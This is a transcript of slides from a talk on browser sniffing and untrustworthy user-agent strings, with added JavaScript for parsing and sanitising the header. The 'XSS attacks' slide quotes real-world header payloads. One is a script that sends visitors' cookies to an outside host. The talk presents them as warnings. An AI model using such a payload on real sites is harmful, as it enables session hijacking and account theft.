everybody lies
Niels Leenheer
halfstack, november 18th 2016
@html5test

warning: this talk is full of lies and deception

yes… this talk is about browser sniffing

why?

browser sniffing is 
 dirty

you should use feature detection

Dear Web Developers: Browser Sniffing is Stupid
http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

5 Reasons Why Browser Sniffing Stinks
https://www.sitepoint.com/why-browser-sniffing-stinks/

Browser Detection is Bad
https://css-tricks.com/browser-detection-is-bad/

best-practices:
feature detection
responsive design
progressive enhancement

anti-pattern: browser sniffing

browser sniffing is just a tool

everybody uses 
 browser sniffing

what… is browser sniffing actually?

the http specification defines the user-agent header 
 
 it contains a string with information about the browser

every request the browser makes to the server includes the user-agent header

GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>

you can access the exact same string using javascript

<script type="text/javascript">
<!--
  alert(navigator.userAgent);
//-->
</script>




you can use the user-agent string to identify: 
 
 the browser 
 the rendering engine 
 the operating system 
 the device model 
 and more

what… is browser sniffing good for?

knowledge

if you know the platform or browser, 
 you can streamline the user experience

if you know your users, 
 you can build a better site for them

if you know which browser is being 
 used, you can work around bugs

if you know which browser is causing errors, you can fix them

privacy implications

changing your user agent 
 string actually makes it 
 easier to track you

anonymity by looking 
 like everybody else

why… is browser sniffing so difficult?

things started out simple

Mosaic/0.9
Mosaic

Mozilla/1.0 (Win3.1)
Netscape Navigator
callout: code name of the browser

but it quickly started 
 to get complicated

Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
Internet Explorer
callout: compatible with Netscape Navigator 1.0

Opera/8.54 (Windows 95; U; en)
Opera

Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Opera

Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00
Opera
callout: real version of the browser

Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5
Firefox
callout: build date of the rendering engine

Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0
Firefox
callout: build date is no longer updated

Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
Firefox

and it gets worse…

Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
Safari

Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
Chrome

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
Opera

Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Internet Explorer

Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
Edge

and those were all relatively normal user-agent strings

sometimes browsers simply do not make sense at all

Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Samsung Internet

Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
Nokia Xpress for Windows Phone

sometimes browsers lie to 
 hide their true identity

Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera

Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera Mobile (desktop mode)
callout: ROT 13 encrypted “mobi”

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Internet Explorer

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Internet Explorer (compatibility view)
callout: Trident 5 means it’s Internet Explorer 9
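
Why token order matters in the strings above, as an added example that is not part of the original slides. The names `identify` and `naive` are hypothetical, and the rule that the Trident version plus 4 gives the Internet Explorer version generalises the slide's "Trident 5 means Internet Explorer 9".

```javascript
// Added example (hypothetical names). Rules are tried in order, most specific
// token first; the first capture group of each regex is the version.
const RULES = [
  ["Edge", /Edge\/([\d.]+)/],                  // also carries Chrome/ and Safari/
  ["Opera", /OPR\/([\d.]+)/],                  // newer Opera, also carries Chrome/
  ["Opera", /^Opera\/.*Version\/([\d.]+)/],    // real version sits in Version/
  ["Opera", /^Opera\/([\d.]+)/],
  ["Chrome", /Chrome\/([\d.]+)/],              // must be tested before Safari
  ["Safari", /Version\/([\d.]+).*Safari\//],
  ["Firefox", /Firefox\/([\d.]+)/],
];

function identify(ua) {
  // Internet Explorer: trust the Trident engine token over MSIE, which
  // compatibility view rewrites and the Trident/7.0 string above omits.
  const trident = /Trident\/(\d+)/.exec(ua);
  const msie = /MSIE ([\d.]+)/.exec(ua);
  if (trident) {
    const real = Number(trident[1]) + 4;       // Trident/5 -> IE 9, Trident/7 -> IE 11
    const claimed = msie ? parseInt(msie[1], 10) : real;
    return { browser: "Internet Explorer", version: String(real), compatView: claimed !== real };
  }
  if (msie) return { browser: "Internet Explorer", version: msie[1], compatView: false };
  for (const [browser, re] of RULES) {
    const m = re.exec(ua);
    if (m) return { browser, version: m[1], compatView: false };
  }
  return { browser: "unknown", version: null, compatView: false };
}

// For contrast: the naive sniff, where the first familiar substring wins.
function naive(ua) {
  const names = ["Safari", "Chrome", "Opera", "MSIE", "Firefox"];
  return names.find((name) => ua.includes(name)) || "unknown";
}

// The Edge string from the slides above.
const EDGE_UA = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) " +
  "Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162";
console.log(naive(EDGE_UA), identify(EDGE_UA));
```

Even these ordered rules report the Opera 7.02 Bork-edition string shown further down as Internet Explorer 6.0, which is the case for a maintained library over hand-written rules.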

sometimes browsers 
 are just weird

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

Mozilla/4.0 (compatible; 
 MSIE 6.0; MSIE 5.5; Windows NT 5.0) 
 Opera 7.02 Bork-edition [en] #1 #2

BORK BORK BORK

and it is possible to change the user-agent string yourself

XSS attacks

<script>alert("My Little Pony");</script>

<script language="JavaScript">document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>

<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">


funny people

(╯°□°)╯︵ ┻━┻

Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)

You’re site is !

angry people

FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 
 FuckYou/123.0 FuckingFox/321.0 
 
 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 
 Presto/2.10.229 Version/11.62 
 
 Seriously, Go fuck yourself 
 
 W3C standards are important.

 Stop fucking obsessing over user-agent already.


1.000.000 unique useragent strings
82 x fuck
10 x shit
6 x ass
9 x dick
3 x vagina
108 x sex
4 x balls

user-agent strings 
 cannot be trusted!
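
Handling the header as untrusted input, as an added example that is not part of the original slides. It assumes a server-side JavaScript service that renders an admin-facing request log as HTML; the function names and the sample entries are hypothetical.

```javascript
// Added example (hypothetical helper names). The User-Agent header is
// attacker-controlled input: bound it, strip control characters, and
// escape it for the context it is written into.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Normalise a raw header value before it is stored or logged.
function cleanUserAgent(raw, maxLength = 256) {
  const text = typeof raw === "string" ? raw : "";
  // Replace CR/LF and other control characters so one request cannot forge
  // extra lines in a text log, then cap the length.
  return text.replace(/[\u0000-\u001f\u007f]/g, " ").slice(0, maxLength);
}

// Render one row of an admin-facing request log as HTML.
function renderLogRow(entry) {
  const ua = escapeHtml(cleanUserAgent(entry.userAgent));
  const path = escapeHtml(String(entry.path));
  return `<tr><td>${path}</td><td>${ua}</td></tr>`;
}

// Constructed log entries; the first value is one of the strings shown above.
const SAMPLE_ENTRIES = [
  { path: "/", userAgent: '<script>alert("My Little Pony");</script>' },
  { path: "/", userAgent: "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" },
  { path: "/login", userAgent: "Example/1.0\r\nforged log line" },
];

for (const entry of SAMPLE_ENTRIES) console.log(renderLogRow(entry));
```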

everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library


#1 use a browser sniffing library that is regularly updated

#2 check if it is possible to automatically schedule updates

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Gandhi


“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler

thank you!
